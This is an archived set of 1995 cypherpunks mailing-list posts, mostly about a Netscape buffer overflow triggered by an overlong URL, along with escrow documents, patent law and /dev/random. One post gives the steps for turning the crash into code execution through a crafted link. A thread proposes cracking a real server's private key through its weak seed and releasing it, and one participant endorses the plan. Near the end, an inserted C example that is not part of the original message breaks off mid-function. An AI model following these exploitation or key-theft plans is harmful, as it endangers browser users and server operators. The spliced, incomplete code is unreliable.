Message-ID: <199509221724.NAA18084@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weinstein <jsw@neon.netscape.com> writes:

>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Lynx can handle it on the info page (reached by pressing '='), but:

In response to selecting the long domain name found in the Warning link in
http://www.grfn.org/~conrad/test.shtml, lynx replied:

- - -

Sorry, you have encountered a bug in Lynx Ver. 2-4-2

Please send a concise mail message to
lynx-bug@ukanaix.cc.ukans.edu describing what you were doing,
the URL you were looking at or attempting to access,
your operating system name with version number,
the TCP/IP implementation that your system is using,
and any other information you deem relevant.

Do not mail the core file if one was generated.

Lynx now exiting with signal:  11


Exiting via interrupt: exit(0)

- - -

[No core file was generated]

My system is: (uname -a)

Linux russell 1.3.26 #2 Thu Sep 14 08:34:38 EDT 1995 i486

Netscape 1.1N for linux crashed in a way that locked my system up, and
caused endless trashing.  I had to reboot, but my filesystem was
undamaged.  Not sure why it crashed and burned on my system while others
have gotten such nice SegVs and core files.  I guess I managed to get
just the right (wrong) thing onto the stack.  :-)  :-(

(P.S. Whoops, just realized that I rebooted with a different kernel;
Lynx did indeed crash under 1.3.26 (post-reboot), but Netscape crashed
under 1.2.13 (pre-reboot).  Pardon me if I don't re-try under 1.3.26,
but having X lock up and hearing my disk trash is not something I relish.)

drc

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGLu1BEcrOJethBVAQEhwwP/cPZ2Gr/MClaywXEAtagNa7n5IyIsqFGI
LmCDxjTMdK/zXzuPcU3Xa53QxOn4dSxQv2PRKHrLGSrVn5vvZHRiYmH5z4NgWvmJ
ETFlFascANzqN2VbHgrn80u3RlFIH0UAUiTgoIFiJ4E3TUzrmt5w4qeXxvfA9PKQ
LQi2oeIArS8=
=EEup
-----END PGP SIGNATURE-----

Last line above should read: "hearing my disk *thrash* ...," not trash.
Signing messages is non-trivial with my current set up, so I don't feel
like re-doing it for such a minor glitch.

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 10:29:48 PDT
To: cypherpunks@toad.com
Subject: YET ANOTHER BAD NETSCAPE BUG (no it isnt!)
Message-ID: <199509221729.NAA16470@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just another reminder that the second bug I posted about was a fluke
on my system and not a real bug. I'm hoping that putting the reminder
in the subject will stop people from forwarding it on to other
lists before reading the retraction. Although this was a false bug,
the overflow bug is very real and verified.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 22 Sep 95 10:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto Sync Issue
In-Reply-To: <199509191846.LAA24272@netcom4.netcom.com>
Message-ID: <m0swC6B-0012rZC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Tom Rollins <kelso@netcom.com> wrote:

> I am interested in encrypting a SLIP link between my
> PC (running Linux) and my Netcom shell account (running
> SLIRP).
> 
> My question has to do with error conditions on the line.
> If I drop a character or packet, the two sides will lose
> crypto sync and result in things scrambled from then on.
> The modems will fix most of the low level problems.
> However, Murphy's Law has not been repealed. :)
> 
> Are there any standard methods to provide the SYNC between
> the sender(encryption) and the receiver(decryption) on
> an Async connection ?
> 
> Since Slip uses IP packets, I was planning on an encryption
> of the data portion of the IP packets (leaving the header
> alone).

A better approach would be to encrypt the entire IP packets and leave the
framing bytes alone.  

But this is what I do:

I use regular unencrypted SLIP (slirp) between here and netcom.
Also install copies of slirp in all your other unix accounts, plus your
favorite session encryption daemon (deslogin, ctcp, ssh, esm, etc).
Then make some script files like this.  For this example I use deslogin
to establish a secure session with utopia.hacktic.nl.

/root/dialup:

#!/bin/csh
dip /root/netcom.dip
/sbin/agetty 38400 ttyqf -l /root/utopiadeslogin &
dip /root/utopia.dip

/root/utopiadeslogin:

#!/bin/csh
exec /usr/local/bin/deslogin ghio@utopia.hacktic.nl

/root/utopia.dip:

port ptyqf
wait ogin: 60
send anything\n
wait d: 5
send password\n
wait ] 5
send \n
send exec slirp-0.9o/src/slirp\n
get $rmtip 10.0.2.42
get $locip 10.0.2.16
mode CSLIP


Add to /etc/hosts:

10.0.2.42       utopia-secure


Then I can do: telnet utopia-secure
and everything is encrypted.

I got deslogin from utopia's anon-ftp dir.
A 3DES version would be nice tho.

When you want to hangup, use this to kill all of the dip processes:

#!/bin/csh
ps -ua|grep " pQf "|awk '{print "kill " $2}'|csh
ps -ua|grep " pS1 "|awk '{print "kill " $2}'|csh


To do this for more hosts, just pick any available IP addresses
in 10.0.2.x and a free tty (ttyq* are usually unused).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 13:49:15 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v02120d04ac88df3d2a8d@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>>
>> Spent too much time last night playing with the Netscape bug;
>> among other things wrote some code to throw various random binary
>> URLs at Netscape. Netscape seems prepared to swallow the bait
>> as long as the URL does _not_ contain characters screened as
>> follows:
>>
>>  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
>>
>> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.
>
>   Did you check 0x20 and 0xa0?  (space and shift-space) I'm sure
>that a space will terminate the href in <a>.
>

This seems not to be the case.
See: http://www.communities.com/foo/bad.html (which contains these
bytes fairly early in the sequence, and still does a lovely job
of crashing.)

Showed the bug to EC's president, he immediately wanted to try
it. It completely blew his PPC Mac (I've got a Powerbook 540C)
out of the water. (Error of type 11, dialog with only
the restart button.) My powerbook hangs on for a bit and then
locks up.

Onward to the exploit!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 22 Sep 95 10:56:39 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221756.NAA15178@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 9/22/95 -0400, Thomas Grant Edwards wrote:
>On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:
>
>> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
>> it out, I've put up a simple page with the url at
>> http://www.redweb.com/experiment/bug.html
>
>Netscape also crashes (error 1) on regular Macs...sigh.  I'm contacting
>someone who just wrote a http server to see how tough it would be to drop
>some code on the stack.
>
>-Thomas


On my 486 running Windoze for Workgroups 3.11 and the latest Netscape Beta
it causes Netscape to die but doesn't lock me up.  

Generally I've found Netscape blows up in a much friendlier way than other
Windoze programs.  I can often recover the Netscape session itself and it
doesn't lock me up as much.

DCF
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Fri, 22 Sep 95 12:10:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Next Hack
Message-ID: <m0swDUR-00061EC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 AM 9/22/95 -0400, Futplex wrote:
>sameer writes:
>> 2) Organize a net-wide search over the space of the RNG seed to 
>> crack the private key of some well known secure server.
>> 
>> 3) Release the private key to the net.
>
>FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO.
>
>For me at least, targeting the key of some particular server that happens to
>be out there is over the line.
>
>If you said you would have someone volunteer a supposedly secure server for
>the challenge, I'd have no qualms.
  
I might disagree with the part about releasing it to the net, but I don't
disagree with targeting a server which is claimed to be "secure."
 
Why?
 
Nobody would have been too upset or surprised if someone had built the
Titanic for the sole purpose of trying to sink it.  It only made waves (pun
alert) because it was claimed to be "unsinkable" (secure), but sank anyway.
 
Maybe a good tactic would be to crack a "secure" server, and send the results
ONLY to the server operators, along with a description of machine-time involved.
 
Put out a public press release, describing the machine-time involved, how it was
possible due to weak crypto imposed by the government, and the possible
economic and commercial implications of said weak crypto.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 14:08:40 PDT
To: frenchie@magus.dgsys.com (SysAdmin)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <m0swELB-000xhVC@magus>
Message-ID: <199509222103.OAA02827@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >   Not that I want to divert attention away from netscape(OK, maybe I
> > do :-) ), but does this bug exist in any other common browser?
> > 
> > 	--Jeff

	This shows that Netscape will probably, after much bad press
and sleepless nights on the part of netscape developers, become one of
the best secure programs out there.
	The cypherpunks will have won because there will be a secure
program available with the backing of lawyers.
	Netscape will have won because their product will be the best.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 22 Sep 95 11:13:25 PDT
To: cypherpunks@toad.com
Subject: Worms and New Netscape Bug
Message-ID: <199509221813.OAA10129@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Although Netscape will certainly fix their new bugs, it's likely that
many old copies will remain on computers on the net, and the holes
will remain.

Netscape could "fight" against this with a modified worms/webcrawler
which looks for blatantly dangerous domain names in URLs and reports
them to "CERT" or blockware companies like Surfwatch.  For example,
they'd find the foo* link at the bottom of 
My page

Not a complete solution obviously (e.g. the server could selectively
reply to requests, and hide from the webcrawler IP).

What happens when someone using the AOL browser clicks on one of these
HREF's... does it crash all of AOL?

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 22 Sep 95 13:19:55 PDT
To: perry <perry@frankenstein.piermont.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306319E6@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger at Sep 22, 95 01:19:37 am wrote:

>David Van Wie writes:
>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.

>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when
>it comes to considering the validity of Bob's patent claim. Is that correct?

Unless Alice made public statements about her invention, you are right.
Something becomes prior art when it is made public.  If she (like most
patent lawyers will advise) kept her mouth shut about what she had invented
until her patent application was filed, she would lose under first to file
rules (assuming step three is that Alice files a patent application).

A quick trip to the soapbox:  First to file rules are good for big
companies, and bad for small inventors.  Big companies have many lawyers, 
and know exactly how each step of the process works.  Small inventors 
usually don't know the process as well, usually have to scrape together the 
thousands of dollars necessary to pursue a patent, and then find a good 
lawyer that they can trust -- all while ensuring that they don't break one 
of the rules about how you must treat your invention before filing.

Moral: First to invent rules, like "natural copyright," are good for the 
little guy because they base patent decisions on when the important things 
(i.e. invention and reduction to practice) happened, not administrative 
things (i.e. complex documents filed with dotted i's and crossed t's).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 22 Sep 95 05:30:42 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509221230.OAA06528@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



These supplement JG's post on CAPSTONE -- which is itself
available with related crypto papers at csrc.ncsl.gov:

------------------

URL: http://csrc.ncsl.nist.gov/nistgen/clip.txt


                CLIPPER CHIP TECHNOLOGY


CLIPPER is an NSA developed, hardware oriented,
cryptographic device that implements a symmetric
encryption/decryption algorithm and a law enforcement
satisfying key escrow system. While the escrow management
system design is not completely designed, the
cryptographic algorithm (SKIPJACK) is completely
specified (and classified SECRET).

The cryptographic algorithm (called CA in this paper) has
the following characteristics:

1.  Symmetric, 80-bit key encryption/decryption
    algorithm;

2.  Similar in function to DES (i.e., basically a 64-bit
    code book transformation that can be used in the
    same four modes of operation as specified for DES in
    FIPS 81);

3.  32 rounds of processing per single encrypt/decrypt
    operation;

4.  Design started by NSA in 1985; evaluation completed
    in 1990.

The CLIPPER CHIP is just one implementation of the CA. 
The CLIPPER CHIP designed for the AT&T commercial secure
voice products has the following characteristics:

1.  Functions specified by NSA; logic designed by
    MYKOTRONX; chip fabricated by VLSI, Inc.: 
    manufactured chip programmed (made unique) by
    MYKOTRONX to security equipment manufacturers
    willing to follow proper security procedures for
    handling and storage of the programmed chip;
    equipment sold to customers;

2.  Resistant to reverse engineering against a very
    sophisticated, well funded adversary;

3.  15-20 MB/S encryption/decryption constant throughout
    once cryptographic synchronization is established
    with distant CLIPPER Chip;

4.  The chip programming equipment writes (one time) the
    following information into a special memory (called
    VROM or VIA-Link) on the chip:

    a.  (unique) serial number
    b.  (unique) unit key
    c.  family key
    d.  specialized control software

5.  Upon generation (or entry) of a session key in the
    chip, the chip performs the following actions:

    a.  Encrypts the 80-bit session key under the unit
        key producing an 80-bit intermediate result;

    b.  Concatenates the 80-bit result with the 25-bit
        serial number and a 23-bit authentication
        pattern (total of 128 bits);

    c.  Enciphers this 128 bits with family key to
        produce a 128-bit cipher block chain called the
        Law Enforcement Field (LEF);

    d.  Transmits the LEF at least once to the intended
        receiving CLIPPER chip;

    e.  The two communicating CLIPPER chips use this
        field together with a random IV to establish
        Cryptographic Synchronization.

6.  Once synchronized, the CLIPPER chips use the session
    key to encrypt/decrypt data in both directions;

7.  The chips can be programmed to not enter secure mode
    if the LEF field has been tampered with (e.g.,
    modified, superencrypted, replaced);

8.  CLIPPER chips will be available from a second source
    in the future;

9.  CLIPPER chips will be modified and upgraded in the
    future;

10. CLIPPER chips presently cost $16.00 (unprogrammed)
    and $26.00 (programmed).

4/30/93

-------------------

URL: http://csrc.ncsl.nist.gov/nistnews/esc_key2.txt


                   February 4, 1994

               AUTHORIZATION PROCEDURES
       FOR RELEASE OF ENCRYPTION KEY COMPONENTS
    IN CONJUNCTION WITH INTERCEPTS PURSUANT TO FISA

The following are the procedures for the release of
escrowed key components in conjunction with lawfully
authorized interception of communications encrypted with
a key-escrow encryption method. These procedures cover
all electronic surveillance conducted pursuant to the
Foreign Intelligence Surveillance Act (FISA), Pub. L.
95-511, which appears at Title 50, U.S. Code, Section
1801 et seq.

1)  In each case there shall be a legal authorization
    for the interception of wire and/or electronic
    communications.

2)  In the event that federal authorities discover
    during the course of any lawfully authorized
    interception that communications encrypted with a
    key-escrow encryption method are being utilized,
    they may obtain a certification from an agency
    authorized to participate in the conduct of the
    interception, or from the Attorney General of the
    United States or designee thereof.  Such
    certification shall

    (a) identify the agency participating in the conduct
        of the interception and the person providing the
        certification;

    (b) certify that necessary legal authorization has
        been obtained to conduct electronic surveillance
        regarding these communications;

    (c) specify the termination date of the period for
        which interception has been authorized;

    (d) identify by docket number or other suitable
        method of specification the source of the
        authorization;

    (e) certify that communications covered by that
        authorization are being encrypted with a
        key-escrow encryption method;

    (f) specify the identifier (ID) number of the
        key-escrow encryption chip providing such
        encryption; and

    (g) specify the serial (ID) number of the key-escrow
        decryption device that will be used by the
        agency participating in the conduct of the
        interception for decryption of the intercepted
        communications.

4)  This certification shall be submitted to each of the
    designated key component escrow agents.  If the
    certification has been provided by an agency
    authorized to participate in the conduct of the
    interception, a copy shall be provided to the
    Department of Justice, Office of Intelligence Policy
    and Review.  As soon as possible, an attorney
    associated with that office shall provide each of
    the key component escrow agents with written
    confirmation of the certification.

5)  Upon receiving the certification, each key component
    escrow agent shall release the necessary key
    component to the agency participating in the conduct
    of the interception.  The key components shall be
    provided in a manner that assures they cannot be
    used other than in conjunction with the lawfully
    authorized electronic surveillance for which they
    were requested.

6)  Each of the key component escrow agents shall retain
    a copy of the certification, as well as the
    subsequent written confirmation of the Department of
    Justice, Office of Intelligence Policy and Review.

7)  Upon, or prior to, completion of the electronic
    surveillance phase of the investigation, the ability
    of the agency participating in the conduct of the
    interception to decrypt intercepted communications
    shall terminate, and such agency may not retain the
    key components.

8)  The Department of Justice shall, in each such case,

    (a) ascertain the existence of authorizations for
        electronic surveillance in cases for which
        escrowed key components have been released;

    (b) ascertain that key components for a particular
        key-escrow encryption chip are being used only
        by an agency authorized to participate in the
        conduct of the interception of communications
        encrypted with that chip; and

    (c) ascertain that, no later than the completion of
        the electronic surveillance phase of the
        investigation, the ability of the agency
        participating in the conduct of the interception
        to decrypt intercepted communications is
        terminated.

9) Reports to the House Permanent Select Committee on
    Intelligence and the Senate Select Committee on    
    Intelligence, pursuant to Section 108 of FISA,
    shall, with respect to any order for authorized
    electronic surveillance for which escrowed
    encryption components were released and used for
    decryption, specifically note that fact.

These procedures do not create, and are not intended to
create, any substantive rights for individuals
intercepted through electronic surveillance, and
noncompliance with these procedures shall not provide the
basis for any motion to suppress or other objection to
the introduction of electronic surveillance evidence
lawfully acquired.

------------------












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Mon, 2 Oct 95 14:19:47 PDT
To: cypherpunks@toad.com
Subject: Re: The Free Speech Implications of Remailers
Message-ID: <m0szsEa-0003M8C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Oct 95 at 22:32, Timothy C. May wrote:

> Crypto anarchy means the racists, sexists, speciesists, and other
> "ists" cannot be muzzled. I call this a good thing. It's why I'm
> here.

I don't mind the mail, it's in a bit bucket, just the cowardly nature 
of it. It was not sent anonymously which can be filtered.

I apologize for spamming the list in response to his message, it
upset me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 22 Sep 95 12:27:31 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com>
Message-ID: <199509221927.PAA16372@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

| I don't believe the Sun Java stuff would suffer from it, although I
| fear Java a great deal.

	I keep hearing this thought.  Isn't Win95 with its
'executables in email' much more dangerous than Java, which at least
tries to address security?

	There is the argument that the claims will inspire false
confidence in Java's security mechanisms, and thus people will be
bitten, but I don't buy it.  People don't look to security as a check
item when buying software.  And when they do, they're usually not
capable of distinguishing between the pap that passes for security
through marketing from security by design.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 22 Sep 95 12:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
Message-ID: <199509221944.PAA06418@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>Proposal for action:
>
>1) Reverse-engineer a server to see if the keygen phase uses
>a weak RNG seed. -- if so, determine the exact algorithm.
>
>2) Organize a net-wide search over the space of the RNG seed to 
>crack the private key of some well known secure server.
>
>3) Release the private key to the net.

Count me in. Let's start with Netscape's own.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGMSJSoZzwIn1bdtAQFqiwF+IZKDv1t5Q2va2yE2JZMCHGITkxoDHHML
alvjYK+XyxPNaVGgRgMk5gTsZMcHqBvz
=meVk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Fri, 22 Sep 95 12:47:17 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221927.PAA16372@homeport.org>
Message-ID: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Adam Shostack wrote:

> Perry E. Metzger wrote:
> 
> | I don't believe the Sun Java stuff would suffer from it, although I
> | fear Java a great deal.
> 
> 	I keep hearing this thought.  Isn't Win95 with its
> 'executables in email' much more dangerous than Java, which at least
> tries to address security?

Is that the new MS-Word you're thinking of?  I hear that it lets you
imbed macros containing executable code in documents.  That's got to
be one of the most dangerous ideas ever cooked up.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Elkins" <elkins@zzyzx.aero.org>
Date: Fri, 22 Sep 95 16:01:15 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509222051.NAA10687@ix.ix.netcom.com>
Message-ID: <95Sep22.160107pdt.111128-3@aero.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Fri, 22 Sep 95 13:04:54 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <m0swELB-000xhVC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Jeff Weinstein wrote:
> 
>   OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen.  As we have already
> determined, I have not reviewed every line of code in netscape.
> 
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
 

TkWWW under Linux 1.2.12 dies with a Segmentation Fault
with this bug :(


- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMGMWyLbmxeO+s+1xAQEa4gP8DLVEoZwrVtqMpztIrCH6sSAdEoUZf3jU
c2AgSNwvqv4/CbGeTxZ7UBFO4hjbUJPlmvwfY0J6yAfsKnYvSxKL55VtbAQzSuac
2KjUSIUh23wpe9hpJaURpK8NM6tlDs2GsoVmdIRL1wFpdwurAeijH1JhSqrJFdKN
b+/jeyTw9+0=
=7ZJq
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 13:19:13 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v02120d01ac88cf556dd4@[199.2.22.120]>
Message-ID: <199509222018.QAA11163@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Spent too much time last night playing with the Netscape bug;
> among other things wrote some code to throw various random binary
> URLs at Netscape. Netscape seems prepared to swallow the bait
> as long as the URL does _not_ contain characters screened as
> follows:
> 
>  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
> 
> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

   Did you check 0x20 and 0xa0?  (space and shift-space) I'm sure
that a space will terminate the href in <a>.

   I've been playing around with Netscape today and I achieved two
things. First, I've isolated a routine very near to where it crashes
(if I set a breakpoint in GDB, it only hits the breakpoint when a domain
is looked up by any method) Secondly, even without disassembly I've been
able to place an exact value in the PC register (0x61616161). Now,
all that's left is to 1) find out where the stack pointer is,
2) make the PC point to some area near the stack pointer, and 3)
create some code which does a syscall on execve with "xterm" as
the argument, with the restriction that it cannot contain any of the
above illegal codes. #3 is the hardest for me since I've never done
assembly under BSDI but I assume it's some sort of trap call I need
to do.

  Once all that is done, just package it up into a URL and you are set
to wreak havoc.

  If someone else exploits the hole before I do, I would urge you not to
reveal the exact implementation to any mailing lists for the simple
reason that even a benign exploitation can be easily modified to be
dangerous. Security through obscurity, I know,  but think about it.
Once you have the URL,  anyone can exploit the bug by pasting it into
their home page. And with the way the net works, this would probably
seem "cool" to most people and it would spread like wildfire. If
you don't reveal the implementation, then perhaps that will buy enough
time for most users to upgrade to Netscape 2.0 before crackers start
exploiting it.

[this bug is far more dangerous than the RNG bug or the 40-bit crypto]

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 22 Sep 95 13:19:43 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <199509222019.QAA16468@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


dmandl@panix.com wrote:
| On Fri, 22 Sep 1995, Adam Shostack wrote:

| > 	I keep hearing this thought.  Isn't Win95 with its
| > 'executables in email' much more dangerous than Java, which at least
| > tries to address security?
| 
| Is that the new MS-Word you're thinking of?  I hear that it lets you
| imbed macros containing executable code in documents.  That's got to
| be one of the most dangerous ideas ever cooked up.

	No, this is a separate problem.  It's not auto-executing code
in Microsoft documents that worries me, so much as the ability to
include executables as clickable images in a mail message, with the
user having no control over what environment the program executes in.

	If strong fences make good neighbors, where are the fences in
my network neighborhood?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodore Ts'o <tytso@MIT.EDU>
Date: Fri, 22 Sep 95 13:40:17 PDT
To: perry@piermont.com
Subject: Re: /dev/random for Linux
In-Reply-To: <199509210349.XAA06110@frankenstein.piermont.com>
Message-ID: <9509222039.AA25206@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   > > On this same track, I suggest that "/dev/random" devices for unix are
   > > an excellent idea. Ted Tso did one for Linux that steals all the bits
   > > of semi-random timing information it can.
   >
   > Anyone know where I can find more information on this wonderful device?

I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus.
There's a fairly long exposition at the beginning of
drivers/char/random.c which explains its theory of operation.

There are some things that I had wanted to do to make it better; for
example, not use MD5 in the inner bucket-mixing, but use a CRC-based
mixing algorithm that Colin had suggested; this should be much faster,
and since I'm using MD5 on the output side of the random number
generator, it should be good enough.  Also, at some point I want to add
code so that it can sample the Pentium instruction cycle clock register,
which will give us a much finer granularity clock with which to measure
events.

However, given the current interest in random number generators ---
thank you Netscape for providing such a wonderful object lesson!  :-) ---
and keeping in mind the saying that the best is often the enemy of the
good, I've decided to make what I have available now, and worry about
improving it later.

In any case, here it is.  With any luck, it'll be included in the 1.3.29
Linux kernel; the idea is that application programs running under Linux
should be able to assume that /dev/random exists and that they can rely
on it.  Perhaps if enough free OS's do this, commercial OS vendors will
get shamed into providing /dev/random on their Unix systems.  Or better
yet, perhaps hardware vendors will decide it's worth including the $10
(if that) worth of parts necessary to have a real, hardware-based random
number generator in their machines.

If there are any representatives from such computer manufacturers,
please consider this a hint.  :-)

						- Ted

begin 644 patches.random.gz
end
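
Added example (not part of Ted Ts'o's message or his patch): one way an application can take its random bytes from the device described above rather than from guessable values. The names read_random, new_token_hex and KEY_BYTES, and the choice to reject anything that is not a character device, are assumptions of this example; the device path is a parameter so it works with /dev/random or /dev/urandom.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define KEY_BYTES 16           /* 128 bits; size chosen for this example */

/* Fill buf with len bytes read from the random device at `path`.
 * Returns 0 on success, -1 on failure. On failure buf is zeroed so the
 * caller never ends up with leftover stack contents in it. */
int read_random(const char *path, unsigned char *buf, size_t len)
{
    struct stat st;
    size_t got = 0;
    int fd = open(path, O_RDONLY);

    if (fd < 0)
        goto fail;
    /* Only accept a character device: a regular file or directory at this
     * path would hand back predictable bytes or none at all. */
    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode))
        goto fail;
    while (got < len) {
        ssize_t n = read(fd, buf + got, len - got);
        if (n > 0)
            got += (size_t)n;          /* short reads are normal: keep going */
        else if (n < 0 && errno == EINTR)
            continue;                  /* interrupted by a signal: retry */
        else
            goto fail;                 /* EOF or a hard error */
    }
    close(fd);
    return 0;

fail:
    if (fd >= 0)
        close(fd);
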